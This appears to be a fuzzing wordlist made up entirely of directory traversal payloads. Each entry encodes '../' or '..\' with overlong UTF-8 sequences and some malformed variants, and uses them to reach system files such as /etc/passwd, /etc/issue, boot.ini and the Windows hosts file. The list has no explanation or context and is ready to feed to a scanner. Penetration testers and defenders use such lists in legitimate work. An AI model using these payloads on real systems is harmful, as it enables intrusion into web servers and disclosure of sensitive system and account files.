-%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fissue -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fboot.ini -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fissue -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fboot.ini -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fissue -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fboot.ini -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd -%e0%80%ae%e0%80%ae%c0%afetc%c0%afissue -%e0%80%ae%e0%80%ae%c0%afboot.ini -%e0%80%ae%e0%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afissue -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afboot.ini -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afissue -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afboot.ini -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afissue -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afboot.ini -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afissue -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afboot.ini -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afetc%c0%afissue -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afboot.ini -%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%af%e0%80%ae%e0%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd -%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cissue -%e0%80%ae%e0%80%ae%c0%5cboot.ini -%e0%80%ae%e0%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cissue -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cboot.ini -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cissue -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cboot.ini -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cissue -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cboot.ini -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cissue -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cboot.ini -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cissue -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cboot.ini -%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5c%e0%80%ae%e0%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd -%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cissue -%e0%80%ae%e0%80%ae%c1%9cboot.ini -%e0%80%ae%e0%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cissue -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cboot.ini -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cissue -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cboot.ini -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cissue -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cboot.ini -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cissue -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cboot.ini -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cissue -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cboot.ini -%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9c%e0%80%ae%e0%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd -%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcissue -%e0%80%ae%e0%80%ae%c1%pcboot.ini -%e0%80%ae%e0%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcissue -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcboot.ini -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcissue -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcboot.ini -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcissue -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcboot.ini -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcissue -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcboot.ini -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcissue -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcboot.ini -%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pc%e0%80%ae%e0%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd -%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vissue -%e0%80%ae%e0%80%ae%c0%9vboot.ini -%e0%80%ae%e0%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vissue -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vboot.ini -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vissue -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vboot.ini -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vissue -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vboot.ini -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vissue -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vboot.ini -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vissue -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vboot.ini -%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9v%e0%80%ae%e0%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd -%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfissue -%e0%80%ae%e0%80%ae%c0%qfboot.ini -%e0%80%ae%e0%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfissue -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfboot.ini -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfissue -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfboot.ini -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfissue -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfboot.ini -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfissue -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfboot.ini -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfissue -%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfboot.ini 